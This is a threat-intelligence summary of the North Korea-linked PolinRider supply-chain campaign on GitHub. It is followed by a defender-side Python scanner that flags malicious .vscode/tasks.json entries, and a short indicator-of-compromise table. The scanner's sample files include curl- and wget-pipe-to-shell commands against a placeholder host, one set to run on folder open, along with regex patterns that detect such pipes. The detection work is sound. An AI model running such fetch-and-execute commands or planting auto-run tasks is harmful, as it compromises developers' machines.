PolinRider Rides Again: North Korean Attack Expands Across GitHub

2026-04-12 OSM

https://opensourcemalware.com/blog/polinrider-rides-again


Open Source Malware reports that the DPRK-linked PolinRider supply-chain campaign expanded from 675 to 1,951 confirmed compromised GitHub repositories across 1,047 owners in five weeks. The campaign injects obfuscated JavaScript into developer configuration files and now overlaps operationally with TasksJacker techniques, including malicious .vscode/tasks.json curl-pipe-to-shell payloads, fake font files, malicious npm packages, and weaponized take-home coding tests. The research identifies a new obfuscator variant using the Cot%3t=shtP marker and MDy decoder function, alongside continued use of blockchain-based C2 patterns and newly discovered C2 subdomains. The findings matter for defenders because GitHub search caps, forks, deleted repositories, and non-default branches likely make the measured victim count a floor rather than the full scope.
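A defender-side triage scanner for the .vscode/tasks.json curl-pipe-to-shell payloads the report describes, added here as an example; it is not code from the report or from Open Source Malware. It assumes VS Code's `runOptions.runOn: "folderOpen"` setting (a real VS Code feature the summary does not mention) as the auto-run trigger, uses constructed sample files, and checks for the page's Cot%3t=shtP obfuscator marker as a cheap secondary indicator.

```python
import json
import re

# Constructed sample .vscode/tasks.json contents (not taken from the report).
BENIGN_TASKS = '''{
  "version": "2.0.0",
  "tasks": [
    {"label": "build", "type": "shell", "command": "npm run build"}
  ]
}'''

SUSPICIOUS_TASKS = '''{
  "version": "2.0.0",
  "tasks": [
    {"label": "prepare", "type": "shell",
     "command": "curl -fsSL https://example.invalid/setup | sh",
     "runOptions": {"runOn": "folderOpen"}},
    {"label": "fetch", "type": "shell",
     "command": "wget", "args": ["-qO-", "https://example.invalid/x", "|", "bash"]}
  ]
}'''

# Obfuscator marker the report attributes to the new PolinRider variant.
OBFUSCATOR_MARKER = "Cot%3t=shtP"

# A downloader (curl/wget) whose output is piped into a shell or interpreter.
PIPE_TO_SHELL = re.compile(
    r"\b(?:curl|wget)\b[^|]*\|\s*(?:sudo\s+)?(?:ba|z|da)?sh\b"
    r"|\b(?:curl|wget)\b[^|]*\|\s*(?:node|python3?)\b")

def task_command(task):
    """Flatten a task's command plus args (either may be a string or a list)."""
    cmd = task.get("command", "")
    parts = list(cmd) if isinstance(cmd, list) else [cmd]
    parts += task.get("args", [])
    return " ".join(str(p) for p in parts)

def find_suspicious_tasks(text):
    """Return (label, auto_runs) for each task that pipes a download into a
    shell; auto_runs is True when VS Code would run it on folder open."""
    findings = []
    for task in json.loads(text).get("tasks", []):
        if PIPE_TO_SHELL.search(task_command(task)):
            auto = task.get("runOptions", {}).get("runOn") == "folderOpen"
            findings.append((task.get("label", "<unlabelled>"), auto))
    return findings

def has_obfuscator_marker(text):
    """Substring check for the variant marker in any config file's raw text."""
    return OBFUSCATOR_MARKER in text
```

Real tasks.json files are often JSONC (comments, trailing commas), which `json.loads` rejects, so run a JSONC-aware parser first when scanning repositories at scale.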

Indicators of Compromise

Type Value First Seen Last Seen
URL https://vscode-extension-260120… 2026-04-12 2026-04-12
DOMAIN onrender.com 2024-08-23 2026-04-12
